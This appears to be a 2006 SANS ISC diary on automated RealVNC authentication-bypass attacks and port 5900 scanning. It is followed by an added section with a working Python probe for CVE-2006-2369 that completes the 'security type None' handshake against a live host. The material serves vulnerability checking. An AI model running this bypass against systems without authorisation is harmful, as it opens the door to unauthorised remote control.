Mailbag and DShield items generate a post VNC exploitation fun question

Published: 2006-11-26
Last Updated: 2006-11-26 23:10:06 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
Over the last three months or so, Handlers have responded to a number of submissions concerning the use of an "older" vulnerability in VNC to exploit systems and install what is typically identified as RBot variants. Reports generally say something along the lines of "I've seen multiple reports from admins who have seen their systems remote controlled by a new Spybot worm via RealVNC. They actually see the start button pushed, the Run command filled....".

One report mentioned that "This appears to be an automated attack on this version of RealVNC.". Another says "I happened to be standing near the PC with iTunes playing and noticed it minimized and restored very quickly. That got my attention.  I noticed the VNC icon was black and within a couple of seconds the hacker clicked Start, then Run and ran (an executable).".

A number of readers have also noted and reported upticks in port 5900 (VNC) scanning. The character of that scanning has certainly changed this year: it changed right after the vulnerability was announced, and then more noticeably in July. Check out the increase in the number of reported sources for destination port 5900 at DShield.

So a question someone might have an answer for is this: are the reports we're receiving, combined with the change in character of port 5900 scanning, indicative of the development of a Metasploit post-VNC-exploitation payload, à la what's described in "Post-exploitation fun in Metasploit 3.0"? All responses will be appreciated.

And thanks to everyone who submitted information.

Current vulnerability information is at:

RealVNC Password Authentication Bypass Vulnerability

Cisco Security Response: RealVNC Remote Authentication Bypass Vulnerability

The flaw is CVE-2006-2369 in RealVNC 4.1.1 (fixed in 4.1.2): the server accepted whatever security type the client selected, including "None" (type 1), without checking it against the list the server had actually offered. A server that still offers only VNC Authentication but completes the handshake when the client answers with type 1 is unpatched; patching, or not exposing 5900/tcp to the Internet at all, is the fix.
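As an added example (not code from the diary, from RealVNC, or from Metasploit), the following Python script checks a VNC server for the authentication bypass referenced above. It performs only the RFB 3.7/3.8 version and security-type handshake: it reads the server's offered security types, deliberately answers with type 1 (None) even when that type was not offered, and then looks at the SecurityResult. A status of 0 when None was not offered means the server has the bug. The `FakeServer` class and its handshake bytes are constructed here for offline demonstration; `check_vnc_auth_bypass` does the same exchange against a real host.

```python
"""Probe a VNC server for the "client picks security type None" bypass.

Example code written for this diary, not RealVNC's or Metasploit's own code.
Handles RFB 3.7/3.8 negotiation only; RFB 3.3 servers pick the type for you.
"""
import socket
import struct

RFB_VERSION = b"RFB 003.008\n"
SEC_NONE = 1      # RFB security type "None"
SEC_VNCAUTH = 2   # RFB security type "VNC Authentication" (DES challenge)


def parse_security_types(data):
    """Parse the server's security-type list (RFB 3.7/3.8).

    Byte 0 is the count. A count of 0 means the server refused the
    connection and a length-prefixed reason string follows; return [].
    """
    if not data:
        raise ValueError("empty security-type message")
    count = data[0]
    if count == 0:
        return []
    if len(data) < 1 + count:
        raise ValueError("truncated security-type list")
    return list(data[1:1 + count])


def classify(offered, result):
    """Verdict from the offered list and the 4-byte SecurityResult the
    server sent after we chose None anyway (None = server closed on us)."""
    if not offered:
        return "refused"
    if SEC_NONE in offered:
        # Server is configured for no authentication; not the bypass bug.
        return "no-auth-configured"
    if result is None or len(result) < 4:
        return "not-vulnerable"
    (status,) = struct.unpack("!I", result[:4])
    return "vulnerable" if status == 0 else "not-vulnerable"


def probe(recv_exact, send):
    """Run the handshake over any transport given recv_exact(n) and send(b)."""
    banner = recv_exact(12)
    if not banner.startswith(b"RFB 003.00"):
        return "not-rfb"
    if banner < b"RFB 003.007":
        return "rfb-3.3-not-checked"   # no client-side type selection in 3.3
    send(RFB_VERSION)
    header = recv_exact(1)
    count = header[0]
    body = recv_exact(count) if count else b""
    offered = parse_security_types(header + body)
    if not offered:
        return classify(offered, None)
    send(bytes([SEC_NONE]))            # the bypass: choose None regardless
    try:
        result = recv_exact(4)         # SecurityResult: 0 = OK, else failed
    except (ConnectionError, socket.timeout):
        result = None
    return classify(offered, result)


def check_vnc_auth_bypass(host, port=5900, timeout=5.0):
    """Probe a live server. Stops after SecurityResult; never sends ClientInit."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        def recv_exact(n):
            buf = b""
            while len(buf) < n:
                chunk = s.recv(n - len(buf))
                if not chunk:
                    raise ConnectionError("peer closed")
                buf += chunk
            return buf
        return probe(recv_exact, s.sendall)


class FakeServer:
    """Constructed in-memory server offering VNC auth only, for offline tests.
    buggy=True mimics a server that accepts any chosen type (the bypass)."""
    def __init__(self, offered, buggy):
        self.offered, self.buggy = offered, buggy
        self.out = RFB_VERSION + bytes([len(offered)]) + bytes(offered)

    def send(self, data):
        if data == RFB_VERSION:
            return
        chosen = data[0]
        # Our probe only ever chooses None, so a 4-byte SecurityResult follows.
        ok = chosen in self.offered or self.buggy
        self.out += struct.pack("!I", 0 if ok else 1)

    def recv_exact(self, n):
        if len(self.out) < n:
            raise ConnectionError("peer closed")
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk


if __name__ == "__main__":
    srv = FakeServer([SEC_VNCAUTH], buggy=True)
    print("constructed 4.1.1-style server:", probe(srv.recv_exact, srv.send))
```

Run it against a host with `check_vnc_auth_bypass("192.0.2.10")` (address is a placeholder). A "vulnerable" verdict means the server completed the handshake with no password; a "no-auth-configured" verdict is a different problem (the operator turned authentication off), which is just as attractive to the automated scanners the diary describes.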
